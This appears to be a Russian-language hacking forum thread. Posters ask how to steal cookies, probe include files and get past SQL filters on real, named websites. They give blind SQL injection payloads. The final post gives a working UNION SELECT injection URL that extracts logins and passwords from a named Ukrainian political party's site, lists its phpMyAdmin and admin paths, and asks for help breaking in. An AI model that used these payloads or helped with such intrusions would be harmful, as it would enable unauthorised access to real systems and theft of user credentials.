Я конечно, ламер, но можно вопрос? Если сайт не юзает XSS, то можно сташить куки через сниффер? Или это невозможно?
есть сайт http://danielbrowninc.com/story_preview.php вылазит ошибка /www/danielbrowninc.com/includes/functions.inc иду на http://danielbrowninc.com/includes/ или на http://danielbrowninc.com/includes/functions.inc вылазит 404 ошибка! как такое могет быть?
сайт может быть в папке html к примеру /www/danielbrowninc.com/html/ поэтому доступа к папке инклудес нет из веба
насканил:все защищено .htaccess-ами и их через лоад файл не прочитать (((((((( придеться шонить другое искать
Возможно просто в твоём functions.inc проверка, если инклюд > Выполняем. Если не инклюд тупо. PHP: header("HTTP/1.0 404 Not Found") or die();
Есть такой скрипт PHP: <?php session_start(); $template->set_filenames(array('head'=>"$template_path/header.html")); $template->pparse('head'); ?> Реально череp параметры переопределить класс template, ну и заставить скрипт делать что-то свое?
Есть страница со слепой скулей. При вводе Code: ?id=1+AND+(SUBSTRING(version(),1,1 ))>33..127 всё работает нормально. При вводе Code: ?id=1+AND+(SUBSTRING((select+login+from+users+limit+1,1),1,1 ))>33..127 Тишина.(таблица и поля 100% называться так) Для проверки ввёл Code: ?id=1+AND+(SUBSTRING((select+select+version()),1,1 ))>33..127 Всё вывелось. Т.е. в коде видимо идёт замена 'select' на '', для пробы попробовал selselectct, тоже не помогло(видимо проверка в цикле), можно тут что-то сделать?
Такая ситуация. Есть сайт одной украинской партии. Есть скуля по нему Code: http://www.prp.org.ua/index.php?mid=10&action=news_full&news_id=-1229%20union%20select%201,login,3,password,5,6,7,8,9,10,11,12,13%20FROM%20private%20-- есть админка Code: http://www.prp.org.ua/phpmyadmin есть ещё конфиг к ней, но я не знаю что с ней делать Code: http://www.prp.org.ua/phpmyadmin/scripts/setup.php Вот ещё сдесь директ админ Code: http://www.prp.org.ua/config помогите...пароли не подходят, и что можно со всем этим сделать